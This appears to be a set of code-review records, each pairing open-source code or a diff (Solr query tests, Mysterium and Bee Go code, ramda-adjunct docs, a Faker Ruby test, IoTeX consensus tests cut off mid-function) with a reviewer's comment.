assertQueryEquals("maxscore", "{!maxscore}A OR B OR C", "A OR B OR C"); assertQueryEquals("maxscore", "{!maxscore}A AND B", "A AND B"); assertQueryEquals("maxscore", "{!maxscore}apache -solr", "apache -solr", "apache -solr "); assertQueryEquals("maxscore", "+apache +solr", "apache AND solr", "+apache +solr"); } /** * this test does not assert anything itself, it simply toggles a static * boolean informing an @AfterClass method to assert that every default * qparser and valuesource parser configured was recorded by * assertQueryEquals and assertFuncEquals. */ public void testParserCoverage() { doAssertParserCoverage = true; } public void testQuerySimple() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("simple", req, "{!simple f=$myField}asdf", "{!simple f=$myField v=asdf}", "{!simple f=foo_s}asdf"); } finally { req.close(); } } public void testQueryMLT() throws Exception { assertU(adoc("id", "1", "lowerfilt", "sample data")); assertU(commit()); try { assertQueryEquals("mlt", "{!mlt qf=lowerfilt}1", "{!mlt qf=lowerfilt v=1}"); } finally { delQ("*:*"); assertU(commit()); } } /** * NOTE: defType is not only used to pick the parser, but also to record * the parser being tested for coverage sanity checking * @see #testParserCoverage * @see #assertQueryEquals */ protected void assertQueryEquals(final String defType, final String... inputs) throws Exception { SolrQueryRequest req = req(new String[] {"df", "text"}); try { assertQueryEquals(defType, req, inputs); } finally { req.close(); } } /** * NOTE: defType is not only used to pick the parser, but, if non-null it is * also to record the parser being tested for coverage sanity checking * * @see QueryUtils#check * @see QueryUtils#checkEqual * @see #testParserCoverage */ protected void assertQueryEquals(final String defType, final SolrQueryRequest req, final String... inputs) throws Exception { if (null != defType) qParsersTested.add(defType); final Query[] queries = new Query[inputs.length]; try { SolrQueryResponse rsp = new SolrQueryResponse(); SolrRequestInfo.setRequestInfo(new SolrRequestInfo(req,rsp)); for (int i = 0; i < inputs.length; i++) { queries[i] = QParser.getParser(inputs[i], defType, true, req).getQuery(); } } finally { SolrRequestInfo.clearRequestInfo(); } for (int i = 0; i < queries.length; i++) { QueryUtils.check(queries[i]); // yes starting j=0 is redundent, we're making sure every query // is equal to itself, and that the quality checks work regardless // of which caller/callee is used. for (int j = 0; j < queries.length; j++) { QueryUtils.checkEqual(queries[i], queries[j]); } } } /** * the function name for val parser coverage checking is extracted from * the first input * @see #assertQueryEquals * @see #testParserCoverage */ protected void assertFuncEquals(final String... inputs) throws Exception { SolrQueryRequest req = req(); try { assertFuncEquals(req, inputs); } finally { req.close(); } } /** * the function name for val parser coverage checking is extracted from * the first input * @see #assertQueryEquals * @see #testParserCoverage */ protected void assertFuncEquals(final SolrQueryRequest req, final String... 
inputs) throws Exception { // pull out the function name final String funcName = (new StrParser(inputs[0])).getId(); valParsersTested.add(funcName); assertQueryEquals(FunctionQParserPlugin.NAME, req, inputs); } public void testAggs() throws Exception { assertFuncEquals("agg(avg(foo_i))", "agg(avg(foo_i))"); assertFuncEquals("agg(avg(foo_i))", "agg_avg(foo_i)"); assertFuncEquals("agg_min(foo_i)", "agg(min(foo_i))"); assertFuncEquals("agg_max(foo_i)", "agg(max(foo_i))"); assertFuncEquals("agg_avg(foo_i)", "agg_avg(foo_i)"); assertFuncEquals("agg_sum(foo_i)", "agg_sum(foo_i)"); assertFuncEquals("agg_count()", "agg_count()"); assertFuncEquals("agg_unique(foo_i)", "agg_unique(foo_i)"); assertFuncEquals("agg_uniqueBlock(foo_i)", "agg_uniqueBlock(foo_i)"); assertFuncEquals("agg_hll(foo_i)", "agg_hll(foo_i)"); assertFuncEquals("agg_sumsq(foo_i)", "agg_sumsq(foo_i)"); assertFuncEquals("agg_percentile(foo_i,50)", "agg_percentile(foo_i,50)"); assertFuncEquals("agg_variance(foo_i)", "agg_variance(foo_i)"); assertFuncEquals("agg_stddev(foo_i)", "agg_stddev(foo_i)"); // assertFuncEquals("agg_multistat(foo_i)", "agg_multistat(foo_i)"); } public void testCompares() throws Exception { assertFuncEquals("gt(foo_i,2)", "gt(foo_i, 2)"); assertFuncEquals("gt(foo_i,2)", "gt(foo_i,2)"); assertFuncEquals("lt(foo_i,2)", "lt(foo_i,2)"); assertFuncEquals("lte(foo_i,2)", "lte(foo_i,2)"); assertFuncEquals("gte(foo_i,2)", "gte(foo_i,2)"); assertFuncEquals("eq(foo_i,2)", "eq(foo_i,2)"); boolean equals = false; try { assertFuncEquals("eq(foo_i,2)", "lt(foo_i,2)"); equals = true; } catch (AssertionError e) { //expected } assertFalse(equals); } public void testChildField() throws Exception { final SolrQueryRequest req = req("q", "{!parent which=type_s1:parent}whatever_s1:foo"); try { assertFuncEquals(req, "childfield(name_s1,$q)", "childfield(name_s1,$q)"); } finally { req.close(); } } public void testPayloadScoreQuery() throws Exception { // I don't see a precedent to test query inequality in here, so doing a `try` // There was a bug with PayloadScoreQuery's .equals() method that said two queries were equal with different includeSpanScore settings try { assertQueryEquals ("payload_score" , "{!payload_score f=foo_dpf v=query func=min includeSpanScore=false}" , "{!payload_score f=foo_dpf v=query func=min includeSpanScore=true}" ); fail("queries should not have been equal"); } catch(AssertionFailedError e) { assertTrue("queries were not equal, as expected", true); } } public void testPayloadCheckQuery() throws Exception { try { assertQueryEquals ("payload_check" , "{!payload_check f=foo_dpf payloads=2}one" , "{!payload_check f=foo_dpf payloads=2}two" ); fail("queries should not have been equal"); } catch(AssertionFailedError e) { assertTrue("queries were not equal, as expected", true); } } public void testPayloadFunction() throws Exception { SolrQueryRequest req = req("myField","bar_f"); try { assertFuncEquals(req, "payload(foo_dpf,some_term)", "payload(foo_dpf,some_term)"); } finally { req.close(); } } public void testBoolQuery() throws Exception { assertQueryEquals("bool", "{!bool must='{!lucene}foo_s:a' must='{!lucene}foo_s:b'}", "{!bool must='{!lucene}foo_s:b' must='{!lucene}foo_s:a'}"); assertQueryEquals("bool", "{!bool must_not='{!lucene}foo_s:a' should='{!lucene}foo_s:b' " + "must='{!lucene}foo_s:c' filter='{!lucene}foo_s:d' filter='{!lucene}foo_s:e'}", "{!bool must='{!lucene}foo_s:c' filter='{!lucene}foo_s:d' " + "must_not='{!lucene}foo_s:a' should='{!lucene}foo_s:b' filter='{!lucene}foo_s:e'}"); try { 
assertQueryEquals ("bool" , "{!bool must='{!lucene}foo_s:a'}" , "{!bool should='{!lucene}foo_s:a'}" ); fail("queries should not have been equal"); } catch(AssertionFailedError e) { assertTrue("queries were not equal, as expected", true); } } // Override req to add df param public static SolrQueryRequest req(String... q) { return SolrTestCaseJ4.req(q, "df", "text"); } }
1
27,802
[0] Not suggesting you change it here, but... it's kind of weird that there's just not an `assertFuncNotEquals`.
apache-lucene-solr
java
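The remark above hints at a helper that does not exist in the test class. A minimal sketch of such a hypothetical `assertFuncNotEquals`, reusing the same `expectThrows` idiom the patch introduces (the helper name and its failure message are invented for illustration):

/** Hypothetical counterpart to assertFuncEquals: passes only if the inputs do NOT parse to equal queries. */
protected void assertFuncNotEquals(final SolrQueryRequest req,
                                   final String... inputs) throws Exception {
  expectThrows(AssertionError.class, "expected error, functions should not be equal",
      () -> assertFuncEquals(req, inputs));
}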
@@ -61,3 +61,19 @@ func (bc *Blockchain) GetAccountantFee(accountantAddress common.Address) (uint16 return res.Value, err } + +// IsRegistered checks wether the given identity is registered or not +func (bc *Blockchain) IsRegistered(registryAddress, addressToCheck common.Address) (bool, error) { + caller, err := bindings.NewRegistryCaller(registryAddress, bc.client) + if err != nil { + return false, errors.Wrap(err, "could not create registry caller") + } + + ctx, cancel := context.WithTimeout(context.Background(), bc.bcTimeout) + defer cancel() + + res, err := caller.IsRegistered(&bind.CallOpts{ + Context: ctx, + }, addressToCheck) + return res, errors.Wrap(err, "could not check registration status") +}
1
/* * Copyright (C) 2019 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package pingpong import ( "context" "time" "github.com/ethereum/go-ethereum/accounts/abi/bind" "github.com/ethereum/go-ethereum/common" "github.com/ethereum/go-ethereum/ethclient" "github.com/mysteriumnetwork/payments/bindings" "github.com/pkg/errors" ) // Blockchain contains all the useful blockchain utilities for the payment off chain messaging type Blockchain struct { client *ethclient.Client bcTimeout time.Duration } // NewBlockchain returns a new instance of blockchain func NewBlockchain(c *ethclient.Client, timeout time.Duration) *Blockchain { return &Blockchain{ client: c, bcTimeout: timeout, } } // GetAccountantFee fetches the accountant fee from blockchain func (bc *Blockchain) GetAccountantFee(accountantAddress common.Address) (uint16, error) { caller, err := bindings.NewAccountantImplementationCaller(accountantAddress, bc.client) if err != nil { return 0, errors.Wrap(err, "could not create accountant implementation caller") } ctx, cancel := context.WithTimeout(context.Background(), bc.bcTimeout) defer cancel() res, err := caller.LastFee(&bind.CallOpts{ Context: ctx, }) if err != nil { return 0, errors.Wrap(err, "could not get accountant fee") } return res.Value, err }
1
15,134
Why are we passing 'registryAddress' here? We should probably construct it together with bc; the registry is not something that changes, is it?
mysteriumnetwork-node
go
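A sketch of the alternative the review above suggests, for illustration only and not the project's actual code: the registry address is supplied once when the Blockchain helper is constructed, so IsRegistered no longer needs it as a parameter. It reuses the imports and bindings already shown in the file above.

// Registry address is captured when the Blockchain helper is built.
type Blockchain struct {
	client          *ethclient.Client
	bcTimeout       time.Duration
	registryAddress common.Address
}

// NewBlockchain now takes the (effectively static) registry address up front.
func NewBlockchain(c *ethclient.Client, timeout time.Duration, registry common.Address) *Blockchain {
	return &Blockchain{client: c, bcTimeout: timeout, registryAddress: registry}
}

// IsRegistered checks whether the given identity is registered or not.
func (bc *Blockchain) IsRegistered(addressToCheck common.Address) (bool, error) {
	caller, err := bindings.NewRegistryCaller(bc.registryAddress, bc.client)
	if err != nil {
		return false, errors.Wrap(err, "could not create registry caller")
	}

	ctx, cancel := context.WithTimeout(context.Background(), bc.bcTimeout)
	defer cancel()

	res, err := caller.IsRegistered(&bind.CallOpts{Context: ctx}, addressToCheck)
	return res, errors.Wrap(err, "could not check registration status")
}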
@@ -2,7 +2,7 @@ import { pathOr, curry, merge } from 'ramda'; /** * Flattens a property path so that its fields are spread out into the provided object. - * + * It's like {@link RA.spreadPath|spreadPath}, but preserves object under property path * * @func flattenPath * @memberOf RA
1
import { pathOr, curry, merge } from 'ramda'; /** * Flattens a property path so that its fields are spread out into the provided object. * * * @func flattenPath * @memberOf RA * @since {@link https://char0n.github.io/ramda-adjunct/1.19.0|v1.19.0} * @category Object * @sig * [Idx] -> {k: v} -> {k: v} * Idx = String | Int * @param {!Array.<string|number>} path The property path to flatten * @param {!Object} obj The provided object * @return {!Object} The flattened object * @see {@link RA.flattenProp|flattenProp} * @example * * R.flattenPath( * ['b1', 'b2'], * { a: 1, b1: { b2: { c: 3, d: 4 } } } * ); // => { a: 1, c: 3, d: 4, b1: { b2: { c: 3, d: 4 } } }; */ const flattenPath = curry((path, obj) => merge(obj, pathOr({}, path, obj))); export default flattenPath;
1
4,930
Missing `.` at the end of the sentence.
char0n-ramda-adjunct
js
@@ -284,12 +284,16 @@ func (s *Service) checkAndAddPeers(ctx context.Context, peers pb.Peers) { ctx, cancel := context.WithTimeout(ctx, pingTimeout) defer cancel() + start := time.Now() + // check if the underlay is usable by doing a raw ping using libp2p if _, err = s.streamer.Ping(ctx, multiUnderlay); err != nil { + s.metrics.PingTime.Observe(float64(time.Since(start).Milliseconds())) s.metrics.UnreachablePeers.Inc() s.logger.Debugf("hive: peer %s: underlay %s not reachable", hex.EncodeToString(newPeer.Overlay), multiUnderlay) return } + s.metrics.PingTime.Observe(float64(time.Since(start).Milliseconds())) bzzAddress := bzz.Address{ Overlay: swarm.NewAddress(newPeer.Overlay),
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package hive exposes the hive protocol implementation // which is the discovery protocol used to inform and be // informed about other peers in the network. It gossips // about all peers by default and performs no specific // prioritization about which peers are gossipped to // others. package hive import ( "context" "encoding/hex" "errors" "fmt" "sync" "time" "golang.org/x/sync/semaphore" "github.com/ethersphere/bee/pkg/addressbook" "github.com/ethersphere/bee/pkg/bzz" "github.com/ethersphere/bee/pkg/hive/pb" "github.com/ethersphere/bee/pkg/logging" "github.com/ethersphere/bee/pkg/p2p" "github.com/ethersphere/bee/pkg/p2p/protobuf" "github.com/ethersphere/bee/pkg/ratelimit" "github.com/ethersphere/bee/pkg/swarm" ma "github.com/multiformats/go-multiaddr" ) const ( protocolName = "hive" protocolVersion = "1.0.0" peersStreamName = "peers" messageTimeout = 1 * time.Minute // maximum allowed time for a message to be read or written. maxBatchSize = 30 pingTimeout = time.Second * 5 // time to wait for ping to succeed batchValidationTimeout = 5 * time.Minute // prevent lock contention on peer validation ) var ( limitBurst = 4 * int(swarm.MaxBins) limitRate = time.Minute ErrRateLimitExceeded = errors.New("rate limit exceeded") ) type Service struct { streamer p2p.StreamerPinger addressBook addressbook.GetPutter addPeersHandler func(...swarm.Address) networkID uint64 logger logging.Logger metrics metrics inLimiter *ratelimit.Limiter outLimiter *ratelimit.Limiter clearMtx sync.Mutex quit chan struct{} wg sync.WaitGroup peersChan chan pb.Peers sem *semaphore.Weighted } func New(streamer p2p.StreamerPinger, addressbook addressbook.GetPutter, networkID uint64, logger logging.Logger) *Service { svc := &Service{ streamer: streamer, logger: logger, addressBook: addressbook, networkID: networkID, metrics: newMetrics(), inLimiter: ratelimit.New(limitRate, limitBurst), outLimiter: ratelimit.New(limitRate, limitBurst), quit: make(chan struct{}), peersChan: make(chan pb.Peers), sem: semaphore.NewWeighted(int64(31)), } svc.startCheckPeersHandler() return svc } func (s *Service) Protocol() p2p.ProtocolSpec { return p2p.ProtocolSpec{ Name: protocolName, Version: protocolVersion, StreamSpecs: []p2p.StreamSpec{ { Name: peersStreamName, Handler: s.peersHandler, }, }, DisconnectIn: s.disconnect, DisconnectOut: s.disconnect, } } func (s *Service) BroadcastPeers(ctx context.Context, addressee swarm.Address, peers ...swarm.Address) error { max := maxBatchSize s.metrics.BroadcastPeers.Inc() s.metrics.BroadcastPeersPeers.Add(float64(len(peers))) for len(peers) > 0 { if max > len(peers) { max = len(peers) } // If broadcasting limit is exceeded, return early if !s.outLimiter.Allow(addressee.ByteString(), max) { return nil } if err := s.sendPeers(ctx, addressee, peers[:max]); err != nil { return err } peers = peers[max:] } return nil } func (s *Service) SetAddPeersHandler(h func(addr ...swarm.Address)) { s.addPeersHandler = h } func (s *Service) Close() error { close(s.quit) stopped := make(chan struct{}) go func() { defer close(stopped) s.wg.Wait() }() select { case <-stopped: return nil case <-time.After(time.Second * 5): return errors.New("hive: waited 5 seconds to close active goroutines") } } func (s *Service) sendPeers(ctx context.Context, peer swarm.Address, peers []swarm.Address) (err error) { s.metrics.BroadcastPeersSends.Inc() stream, err := 
s.streamer.NewStream(ctx, peer, nil, protocolName, protocolVersion, peersStreamName) if err != nil { return fmt.Errorf("new stream: %w", err) } defer func() { if err != nil { _ = stream.Reset() } else { // added this because Recorder (unit test) emits an unnecessary EOF when Close is called time.Sleep(time.Millisecond * 50) _ = stream.Close() } }() w, _ := protobuf.NewWriterAndReader(stream) var peersRequest pb.Peers for _, p := range peers { addr, err := s.addressBook.Get(p) if err != nil { if err == addressbook.ErrNotFound { s.logger.Debugf("hive broadcast peers: peer not found in the addressbook. Skipping peer %s", p) continue } return err } peersRequest.Peers = append(peersRequest.Peers, &pb.BzzAddress{ Overlay: addr.Overlay.Bytes(), Underlay: addr.Underlay.Bytes(), Signature: addr.Signature, Transaction: addr.Transaction, }) } if err := w.WriteMsgWithContext(ctx, &peersRequest); err != nil { return fmt.Errorf("write Peers message: %w", err) } return nil } func (s *Service) peersHandler(ctx context.Context, peer p2p.Peer, stream p2p.Stream) error { s.metrics.PeersHandler.Inc() _, r := protobuf.NewWriterAndReader(stream) ctx, cancel := context.WithTimeout(ctx, messageTimeout) defer cancel() var peersReq pb.Peers if err := r.ReadMsgWithContext(ctx, &peersReq); err != nil { _ = stream.Reset() return fmt.Errorf("read requestPeers message: %w", err) } s.metrics.PeersHandlerPeers.Add(float64(len(peersReq.Peers))) if !s.inLimiter.Allow(peer.Address.ByteString(), len(peersReq.Peers)) { _ = stream.Reset() return ErrRateLimitExceeded } // close the stream before processing in order to unblock the sending side // fullclose is called async because there is no need to wait for confirmation, // but we still want to handle not closed stream from the other side to avoid zombie stream go stream.FullClose() select { case s.peersChan <- peersReq: case <-s.quit: return errors.New("failed to process peers, shutting down hive") } return nil } func (s *Service) disconnect(peer p2p.Peer) error { s.clearMtx.Lock() defer s.clearMtx.Unlock() s.inLimiter.Clear(peer.Address.ByteString()) s.outLimiter.Clear(peer.Address.ByteString()) return nil } func (s *Service) startCheckPeersHandler() { ctx, cancel := context.WithCancel(context.Background()) s.wg.Add(1) go func() { defer s.wg.Done() <-s.quit cancel() }() s.wg.Add(1) go func() { defer s.wg.Done() for { select { case <-ctx.Done(): return case newPeers := <-s.peersChan: s.wg.Add(1) go func() { defer s.wg.Done() cctx, cancel := context.WithTimeout(ctx, batchValidationTimeout) defer cancel() s.checkAndAddPeers(cctx, newPeers) }() } } }() } func (s *Service) checkAndAddPeers(ctx context.Context, peers pb.Peers) { var peersToAdd []swarm.Address mtx := sync.Mutex{} wg := sync.WaitGroup{} for _, p := range peers.Peers { err := s.sem.Acquire(ctx, 1) if err != nil { return } wg.Add(1) go func(newPeer *pb.BzzAddress) { defer func() { s.sem.Release(1) wg.Done() }() multiUnderlay, err := ma.NewMultiaddrBytes(newPeer.Underlay) if err != nil { s.logger.Errorf("hive: multi address underlay err: %v", err) return } ctx, cancel := context.WithTimeout(ctx, pingTimeout) defer cancel() // check if the underlay is usable by doing a raw ping using libp2p if _, err = s.streamer.Ping(ctx, multiUnderlay); err != nil { s.metrics.UnreachablePeers.Inc() s.logger.Debugf("hive: peer %s: underlay %s not reachable", hex.EncodeToString(newPeer.Overlay), multiUnderlay) return } bzzAddress := bzz.Address{ Overlay: swarm.NewAddress(newPeer.Overlay), Underlay: multiUnderlay, Signature: 
newPeer.Signature, Transaction: newPeer.Transaction, } err = s.addressBook.Put(bzzAddress.Overlay, bzzAddress) if err != nil { s.logger.Warningf("skipping peer in response %s: %v", newPeer.String(), err) return } mtx.Lock() peersToAdd = append(peersToAdd, bzzAddress.Overlay) mtx.Unlock() }(p) } wg.Wait() if s.addPeersHandler != nil && len(peersToAdd) > 0 { s.addPeersHandler(peersToAdd...) } }
1
15,524
Wouldn't it be useful to split this out, so that failed pings are recorded under a separate error metric rather than under the same timing metric? (A possible split is sketched after this record.)
ethersphere-bee
go
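One way to read the comment above, sketched under the assumption that the metrics struct is Prometheus-style (as the existing Observe/Inc calls in the patch suggest): record failed pings under their own histogram instead of folding them into the overall ping timing. PingFailureTime is a hypothetical metric, not part of the reviewed code.

	start := time.Now()

	// check if the underlay is usable by doing a raw ping using libp2p
	if _, err = s.streamer.Ping(ctx, multiUnderlay); err != nil {
		// failed pings get their own metric so they do not skew PingTime
		s.metrics.PingFailureTime.Observe(float64(time.Since(start).Milliseconds()))
		s.metrics.UnreachablePeers.Inc()
		s.logger.Debugf("hive: peer %s: underlay %s not reachable", hex.EncodeToString(newPeer.Overlay), multiUnderlay)
		return
	}
	s.metrics.PingTime.Observe(float64(time.Since(start).Milliseconds()))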
@@ -47,4 +47,8 @@ class TestFakerName < Test::Unit::TestCase assert @tester.initials.match(/[A-Z]{3}/) assert @tester.initials(2).match(/[A-Z]{2}/) end + + def test_fictional_character_name + assert @tester.fictional_character_name.match(/\w+/) + end end
1
# frozen_string_literal: true require_relative '../../test_helper' class TestFakerName < Test::Unit::TestCase def setup @tester = Faker::Name end def test_name assert @tester.name.match(/(\w+\.? ?){2,3}/) end def test_name_with_middle assert @tester.name_with_middle.match(/(\w+\.? ?){3,4}/) end def test_first_name assert @tester.first_name.match(/(\w+\.? ?){3,4}/) end def test_male_first_name assert @tester.male_first_name.is_a? String end def test_female_first_name assert @tester.female_first_name.is_a? String end def test_middle_name assert @tester.middle_name.match(/(\w+\.? ?){3,4}/) end def test_last_name assert @tester.last_name.match(/(\w+\.? ?){3,4}/) end def test_prefix assert @tester.prefix.match(/[A-Z][a-z]+\.?/) end def test_suffix assert @tester.suffix.match(/[A-Z][a-z]*\.?/) end def test_initials assert @tester.initials.match(/[A-Z]{3}/) assert @tester.initials(2).match(/[A-Z]{2}/) end end
1
9,121
Not sure if this is good enough. Each generator will have its own unit test anyway. Ideally, I think I'd want to test that each generator in the yml is actually a valid generator...
faker-ruby-faker
rb
@@ -1293,6 +1293,8 @@ func newTestCFSM( MintNewSecretBlock(gomock.Any(), gomock.Any(), gomock.Any()).Return(secretBlkToMint, nil).AnyTimes() blockchain.EXPECT(). Nonce(gomock.Any()).Return(uint64(0), nil).AnyTimes() + blockchain.EXPECT(). + MintNewBlockWithActionIterator(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(blkToMint, nil).AnyTimes() if mockChain == nil { candidates := make([]*state.Candidate, 0) for _, delegate := range delegates {
1
// Copyright (c) 2018 IoTeX // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package rolldpos import ( "context" "math/big" "testing" "time" "github.com/facebookgo/clock" "github.com/golang/mock/gomock" "github.com/pkg/errors" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" "github.com/iotexproject/iotex-core/action" "github.com/iotexproject/iotex-core/address" "github.com/iotexproject/iotex-core/blockchain" "github.com/iotexproject/iotex-core/config" "github.com/iotexproject/iotex-core/crypto" "github.com/iotexproject/iotex-core/endorsement" "github.com/iotexproject/iotex-core/iotxaddress" "github.com/iotexproject/iotex-core/logger" "github.com/iotexproject/iotex-core/pkg/hash" "github.com/iotexproject/iotex-core/pkg/keypair" "github.com/iotexproject/iotex-core/state" "github.com/iotexproject/iotex-core/test/mock/mock_actpool" "github.com/iotexproject/iotex-core/test/mock/mock_blockchain" "github.com/iotexproject/iotex-core/test/mock/mock_network" "github.com/iotexproject/iotex-core/test/testaddress" "github.com/iotexproject/iotex-core/testutil" ) var testAddrs = []*iotxaddress.Address{ newTestAddr(), newTestAddr(), newTestAddr(), newTestAddr(), newTestAddr(), } func TestBackdoorEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() ctx := makeTestRollDPoSCtx( testAddrs[0], ctrl, config.RollDPoS{ EventChanSize: 1, EnableDKG: true, }, func(mockBlockchain *mock_blockchain.MockBlockchain) { mockBlockchain.EXPECT().TipHeight().Return(uint64(0)).Times(8) }, func(_ *mock_actpool.MockActPool) {}, func(_ *mock_network.MockOverlay) {}, clock.New(), ) cfsm, err := newConsensusFSM(ctx) require.Nil(t, err) require.NotNil(t, cfsm) require.Equal(t, sEpochStart, cfsm.currentState()) cfsm.Start(context.Background()) defer cfsm.Stop(context.Background()) for _, state := range consensusStates { cfsm.produce(cfsm.newBackdoorEvt(state), 0) testutil.WaitUntil(10*time.Millisecond, 100*time.Millisecond, func() (bool, error) { return state == cfsm.currentState(), nil }) } } func TestRollDelegatesEvt(t *testing.T) { t.Parallel() t.Run("is-delegate", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM(t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sDKGGeneration, s) assert.NoError(t, err) assert.Equal(t, uint64(1), cfsm.ctx.epoch.height) assert.Equal(t, uint64(1), cfsm.ctx.epoch.num) assert.Equal(t, uint(2), cfsm.ctx.epoch.numSubEpochs) crypto.SortCandidates(delegates, cfsm.ctx.epoch.num, crypto.CryptoSeed) assert.Equal(t, delegates, cfsm.ctx.epoch.delegates) assert.Equal(t, eGenerateDKG, (<-cfsm.evtq).Type()) }) t.Run("is-not-delegate", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i+1].RawAddress } cfsm := newTestCFSM(t, testAddrs[0], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) 
assert.Equal(t, sEpochStart, s) assert.NoError(t, err) // epoch ctx not set assert.Equal(t, uint64(0), cfsm.ctx.epoch.height) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) t.Run("calcEpochNumAndHeight-error", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(mockBlockchain *mock_blockchain.MockBlockchain) { mockBlockchain.EXPECT().TipHeight().Return(uint64(0)).Times(2) mockBlockchain.EXPECT().CandidatesByHeight(gomock.Any()).Return(nil, nil).Times(1) }, nil, clock.New(), ) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sEpochStart, s) assert.Error(t, err) // epoch ctx not set assert.Equal(t, uint64(0), cfsm.ctx.epoch.height) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) t.Run("rollingDelegates-error", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(mockBlockchain *mock_blockchain.MockBlockchain) { mockBlockchain.EXPECT().TipHeight().Return(uint64(1)).Times(2) mockBlockchain.EXPECT().CandidatesByHeight(gomock.Any()).Return(nil, nil).Times(1) }, nil, clock.New(), ) s, err := cfsm.handleRollDelegatesEvt(cfsm.newCEvt(eRollDelegates)) assert.Equal(t, sEpochStart, s) assert.Error(t, err) // epoch ctx not set assert.Equal(t, uint64(0), cfsm.ctx.epoch.height) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) } func TestGenerateDKGEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } t.Run("no-delay", func(t *testing.T) { cfsm := newTestCFSM(t, test21Addrs[2], test21Addrs[2], ctrl, delegates, nil, nil, clock.New()) s, err := cfsm.handleGenerateDKGEvt(cfsm.newCEvt(eGenerateDKG)) assert.Equal(t, sRoundStart, s) assert.NoError(t, err) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) }) t.Run("delay", func(t *testing.T) { cfsm := newTestCFSM(t, test21Addrs[2], test21Addrs[2], ctrl, delegates, nil, nil, clock.New()) cfsm.ctx.cfg.ProposerInterval = 2 * time.Second start := time.Now() s, err := cfsm.handleGenerateDKGEvt(cfsm.newCEvt(eGenerateDKG)) assert.Equal(t, sRoundStart, s) assert.NoError(t, err) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) // Allow 1 second delay during the process assert.True(t, time.Since(start) > time.Second) }) } func TestStartRoundEvt(t *testing.T) { t.Parallel() t.Run("is-proposer", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } cfsm := newTestCFSM(t, testAddrs[2], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) cfsm.ctx.epoch = epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } require := require.New(t) s, err := cfsm.handleStartRoundEvt(cfsm.newCEvt(eStartRound)) require.NoError(err) require.Equal(sBlockPropose, s) require.Equal(uint64(0), cfsm.ctx.epoch.subEpochNum) require.NotNil(cfsm.ctx.round.proposer, delegates[2]) require.NotNil(cfsm.ctx.round.endorsementSets, s) e := <-cfsm.evtq require.Equal(eInitBlockPropose, e.Type()) e = <-cfsm.evtq require.Equal(eProposeBlockTimeout, e.Type()) e = 
<-cfsm.evtq require.Equal(eEndorseProposalTimeout, e.Type()) e = <-cfsm.evtq require.Equal(eEndorseLockTimeout, e.Type()) }) t.Run("is-not-proposer", func(t *testing.T) { ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i+1].RawAddress } cfsm := newTestCFSM(t, testAddrs[1], testAddrs[2], ctrl, delegates, nil, nil, clock.New()) cfsm.ctx.epoch = epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } require := require.New(t) s, err := cfsm.handleStartRoundEvt(cfsm.newCEvt(eStartRound)) require.NoError(err) require.Equal(sBlockPropose, s) require.Equal(uint64(0), cfsm.ctx.epoch.subEpochNum) require.NotNil(cfsm.ctx.round.proposer, delegates[2]) require.NotNil(cfsm.ctx.round.endorsementSets, s) evt := <-cfsm.evtq require.Equal(eInitBlockPropose, evt.Type()) s, err = cfsm.handleInitBlockProposeEvt(evt) require.Equal(sAcceptPropose, s) require.NoError(err) evt = <-cfsm.evtq require.Equal(eProposeBlockTimeout, evt.Type()) s, err = cfsm.handleProposeBlockTimeout(evt) require.Equal(sAcceptProposalEndorse, s) require.NoError(err) evt = <-cfsm.evtq 